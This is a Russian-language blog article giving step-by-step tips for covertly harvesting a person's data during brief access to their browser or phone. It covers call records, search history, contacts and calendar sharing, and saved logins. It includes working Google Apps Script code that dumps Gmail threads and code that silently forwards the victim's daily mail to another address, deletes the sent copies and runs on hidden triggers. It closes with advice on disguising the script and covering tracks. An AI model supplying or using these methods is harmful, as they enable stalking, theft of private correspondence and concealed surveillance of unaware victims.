Что интересного можно собрать, получив доступ к чужому браузеру на 5 минут
Применяя советы из статьи помните об Уголовном Кодексе, золотом правиле нравственности и о том, как неприятно будет человеку, если он узнает, что вы делали что-то подобное.
Этот материал — продолжение статьи Что интересного можно собрать, получив доступ к чужому Mac на минуту. В ней написано о том, какую информацию о человеке можно узнать из его компьютера, пока тот ненадолго отошел. Сегодня расскажу о фишках по быстрому сбору информации из браузера.
Многие сайты не просят авторизации с паролем при каждом заходе на них и это открывает огромные возможности для доморощенных детективов. Все фишки из статьи просты, выполняются за несколько минут и не требуют теоретической подготовки.
Но если вдруг соберетесь применять их для реальной слежки, рекомендую немного потренироваться на своем компьютере, чтобы чувствовать себя уверенно.
Естественно, все эти знания могут вам пригодиться для личных мирных целей: сбор информации из собственного почтового ящика, наведение порядка в контактах и т.д.
1. Получаем детализацию звонков
Чтобы получить детальную информацию о звонках абонентах не нужно иметь связей в органах или тайно снимать скан паспорта, готовясь атаковать менеджера салона сотовой связи приемами социнженерии. Достаточно получить аппарат с нужной симкой на пять минут в личное пользование.
У МТС (и Билайн вроде тоже), если раздать WiFi с телефона, то с компьютера вход в личный кабинет осуществляется без пароля. В личном кабинете можно заказать PDF (или XLS) файл с детализацией звонков за полгода (или более короткий срок) и послать на любой адрес электронной почты. И этот процесс занимает меньше минуты! Естественно, тоже самое можно провернуть, если зайти в личный кабинет непосредственно со смартфона.
Другие операторы я не проверяла, но скорее всего у них аналогичная ситуация. Так что не стоит просматривать историю звонков на телефоне, лучше сразу послать детализацию себе на почту. Очень удобно, что в файле видно из каких регионов идут звонки. Можно отследить местоположение абонента в разные периоды:
Свести номера из детализации с реальными людьми поможет восьмой раздел из статьи Что интересного можно собрать, получив доступ к чужому компьютеру Mac на минуту, либо информация в пункте 4 текущего текста.
2. Смотрим историю поиска
Открываем history.google.com, нажимаем на иконку «три вертикальные точки» и в открывшемся меню выбираем пункт Download searches, соглашаемся с условиями и закрываем уведомление о том, что архив с историей поиска придет к нам на почтовый ящик. Открываем Gmail и дожидаемся письма с искомым файлом (придет через пару минут). Не забываем удалить это письмо.
Поисковые запросы в архиве распределены по месяцам в файлы формата json. Его можно конвертировать в файл Microsoft Excel на сайте json-xls.com.
3. Сохраняем себе чужие письма
Это трюк проходит только с почтовым ящиками на Gmail. Идем на docs.google.com и создаем новый файл. Открываем Инструметы→Редактор скриптов и копируем в него следующий код:
function collectEmails() { var doc = DocumentApp.create('Переписка'); // Новый файл появится в корневой папке Google диска var searchText = "[email protected]"; // Адрес, переписку с которым надо сохранить var finalText = ""; // Переменная в которую будем собирать тексты писем var body = doc.getBody(); var threads = GmailApp.search(searchText); //Ищем все письма, содержащие искомый адрес for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем var messages = threads[x].getMessages(); // Разбираем цепочку по письмам for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо finalText=finalText + messages[i].getSubject() + messages[i].getPlainBody() + "";// Считываем из него текст и тему } body.appendParagraph(finalText); // Записываем тексты и темы всех писем в файл } }
Нажимаем кнопку запуска и соглашаемся на предложение о сохранение проекта. Еще раз нажимаем на кнопку запуска и даем скрипту разрешение на доступ к почте. Никаких паролей никто не спрашивает. Готовый файл можно скачать себе на флешку для последующего ознакомления (Файл → Скачать как). Не забываем об удалении всех созданных файлов.
Метод search () можно использовать не только для поиска переписки с конкретным человеком. Вот другие примеры поисковых запросов, которые можно указать в скобках:
- from: Иван Иванов — письма от адресата с определенным именем;
- subject: Расчет — письма с определенной темой;
- has: attachment — письма, у которых есть прикрепленные файлы;
- is: unread — непрочитанные письма;
- is: spamed — письма из папки «Спам»;
- after: 2016/04/01 — письма, отправленные после 1 апреля 2016 года;
- before: 2016/04/01 — письма, отправленные до 1 апреля 2016 года;
- circle: Семья — поиск писем от участников круга «Семья»;
- size:2 000 000 — письма больше 2 мегабайт.
Если вы хотите использовать несколько параметров, то указывайте их через пробел.
Можно было просто скачать почтовый ящик в формате mbox, но для этого необходимы ввод пароля и длительное ожидание.
4. Экспортируем контакты из Gmail
Идем на contacts.google.com, в правом меню выбираем пункт Экспорт, читаем сообщение о том, что экспорт поддерживается только старой версией контактов и переходим на нее по ссылке в окне. Попав в старую версию, нажимаем на шестеренку и в выпадающем меню выбираем пункт Экспорт, выбираем параметры экспорта в появившемся окне и нажимаем на кнопку экспорт. В папке загрузок ищем CSV-файл, который можно открыть в Excel, Numbers или Google Docs.
5. Следим за жизнью жертвы
Идем на calendar.google.com, нажимаем на шестеренку, выбираем пункт меню Настройки → Календари, находим интересующий нас календарь и переходим о ссылке Открыть общий доступ к календарю слева от него. На открывшейся странице указываем электронный адрес аккаунта Google, с которого собираетесь наблюдать за календарем.
Пользователь обнаружит слежку за своим расписанием, только если захочет расшарить его кому-то еще и зайдет в настройки.
6. Читаем чужую почту каждый день
Часто ли вы смотрите папку «Удаленные»? Большинство людей, которые не слишком активно пользуются почтой, заглядывают в нее раз в квартал и можно спокойно пересылать их письма себе.
Если в Gmail настроить автоматическую пересылку почты традиционным способом на некий адрес, то неделю при заходе в почту будет отображаться всплывающее уведомление об этом сверху экрана. Это делается в целях защиты пользователя от любителей следить за чужой перепиской.
Но если сделать это с помощью Google Apps Script, то никто ничего не заметит (если, конечно, жертва регулярно не просматривает список триггеров GAS).
Идем на docs.google.com и создаем новый файл. Открываем Инструметы→Редактор скриптов и копируем в него следующий код:
function forwardEmails() { var searchText = "newer_than:1d"; var threads = GmailApp.search(searchText); // Ищем письма, отправленные в последние сутки for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем var messages = threads[x].getMessages(); // Разбираем цепочку по письмам for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо messages[i].forward("[email protected]");// Пересылаем письмо на нужный адрес } } }
Этот код пересылает на определенный адрес все письма, которые отправлены в последние сутки (естественно, при вставке кода надо не забыть этот адрес указать). При желании можно добавить другие фильтры поиска писем (они описаны в третьем разделе этой статьи). Теперь надо вставить код, который будет удалять пересланные письма из папки «Отправленные»:
function deletedEmails() { var searchText = "to:[email protected]"; var threads = GmailApp.search(searchText); // Ищем письма, отправленные на адрес для слежки for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем var messages = threads[x].getMessages(); // Разбираем цепочку по письмам for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо messages[i]..moveToTrash(); // Перемещаем письмо в папку удаленные } } }
А теперь нам нужно сделать так, чтобы эти две функции запускались каждую ночь. В редакторе скриптов идем в Ресурсы → Триггеры текущего проекта
Сохраняем изменения. Все! Теперь каждое утро вы можете читать письма жертвы!
К сожалению, если человек активно пользуется Google Docs, то он может обнаружить пустой файл со скриптами. Но если вставить в нее инфу о горячих клавишах для сервисов Google и назвать Autogenerated Help Document, то есть шанс, что в суете дел человек не увидит в нем опасности. Можно еще подписать где-нибудь предупреждение, чтобы человек не удалял этот файл, если хочет получать новую полезную информацию.
Если вышеприведенный абзац кажется вам смешным, вспомните строчку: «И обмануть меня нетрудно, я сам обманываться рад». Человек скорее поверит, что Google сам создает ему файлы помощи, чем предположит, что кто-то лазил в его Google Drive в его отсутствие, так как подсознание охраняет человека от столь травмирующих фактов.
7. Сохраняем переписку VK и прочие страницы с личной информацией
Для переписки VK совет будет предельно простой: прокручиваем страницу с диалогами максимально вниз и выбираем пункт меню Файл → Сохранить/либо Экспортировать как PDF. После копируем сохраненный файл к себе на флешку и по завершению операции в спокойной обстановке изучаем собеседников человека и их страницы. Аналогично можно поступить со всеми сайтами, на которых есть возможность обмениваться личными сообщениями.
Если очень надо и у вас есть хотя бы полчаса доступа, то можно намутить сохранитель сообщений на iMacros, который сохранит переписку полностью. Но готовый код в статье дать сложно, так как там необходимо использовать указатели элементов по координатам X, Y, которые у каждого пользователя будут свои. А для описания общего подхода к написанию таких макросов нужна отдельная статья. Что-то можно почерпнуть из Хочешь я посижу в интернете за тебя?. Плюс этот способ уже выходит за рамки 5-минутного вторжения.
8. Узнаем на каких сайтах и под какими логинами зарегистрирован человек
В большинстве браузеров хранится список сохраненных логинов и паролей для сайтов, на которых зарегистрирован пользователь. В Safari их можно посмотреть в Safari→Настройки→Пароли. Список сайтов с логинами можно скопировать, последовательно нажав Command + A и Command + С.
9. IP-адрес
Если есть подозрения, что человек троллит вас в комментах, делает фейковые заказы в вашем интернет магазине, нагло ворует контент с вашего проекта (таких людей можно выследить с помощью «Вебвизора» от Яндекс.Метрики), то нужно сравнить его IP-адрес с IP хулигана, определенный счетчиком. Сделать это можно на 2ip.ru.
Не забываем заметать следы
После завершения всех операций необходимо аккуратно почистить историю, список загрузок и папку загрузок.
А также необходимо сделать так, чтобы история изменений файлов на Google Drive выглядела естественно, то есть, чтобы сверху уведомления о создании новой таблицы появился список действий (размером с правую панель), которые бы не вызывали подозрений у жертвы.
Пример как это сделать: тайком позвонить другу и попросить расшарить жертве какие-нибудь файлы на Google Диске (со словами: сделай сейчас, пожалуйста, чтобы не забыть). И надо подгадать так, чтобы файлов/папок с файлами было несколько.
Естественно, это далеко не полный список того, что можно вытащить из браузера человека. Если как следует подумать (особенно над тем, как отвлечь жертву хотя бы на полчасика), то можно обнаружить десятки не менее эффективных фишек.
В закладки